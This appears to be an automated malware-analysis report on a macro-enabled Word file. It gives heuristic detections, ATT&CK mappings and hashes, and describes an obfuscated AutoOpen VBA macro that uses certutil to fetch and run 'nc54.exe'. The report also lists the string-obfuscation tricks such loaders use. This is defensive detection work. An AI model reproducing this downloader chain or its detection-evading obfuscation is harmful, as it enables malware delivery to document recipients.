MALICIOUS
Risk Score: 190

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains an obfuscated VBA macro with an AutoOpen subroutine that uses the Shell() function. The macro attempts to download a second-stage executable named 'nc54.exe' from 'http://localhost:222/nc54.exe' with certutil and then executes it. Obfuscated VBA combined with execution of a downloaded payload is characteristic of downloader malware.
Heuristics (6)

- VBA project inside OOXML (medium; 4 related findings) [OOXML_VBA]
  Document contains a VBA project; VBA macros present.
- Potential Shell call in VBA (critical) [OLE_VBA_SHELL]
  Potential Shell call in VBA.
  Matched line in script: `Shell (last)`
- Obfuscated auto-exec VBA loader (critical) [OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]
  Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script: `Shell (last)`
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
  Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low) [OLE_VBA_AUTOOPEN]
  AutoOpen macro.
  Matched lines in script: `Attribute VB_Name = "NewMacros"` and `Sub AutoOpen()`
- Embedded URL (info) [EMBEDDED_URL]
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL below was found in document text (OOXML body / shared strings):
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.microsoft.com/office/drawing/2014/chartex
  - http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
  - http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
  - http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.microsoft.com/office/drawing/2016/ink
  - http://schemas.microsoft.com/office/drawing/2017/model3d
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2012/wordml
  - http://schemas.microsoft.com/office/word/2016/wordml/cid
  - http://schemas.microsoft.com/office/word/2015/wordml/symex
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)
Files carved from inside the sample during analysis.
- macros.bas (vba-macro), 7029 bytes
  Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
  SHA-256: d6355edf110ba070b7208c22e62666612143c0d28ddd743c6b0184a4f417ef31
  Preview script: first 1,000 lines of the extracted script
- vbaProject_00.bin (vba-project), 22016 bytes
  Source: OOXML VBA project: word/vbaProject.bin
  SHA-256: 490c602f3dc28fa1ecbdee582d66e11b52e9997d0c1f4c87543b81cb4e8df852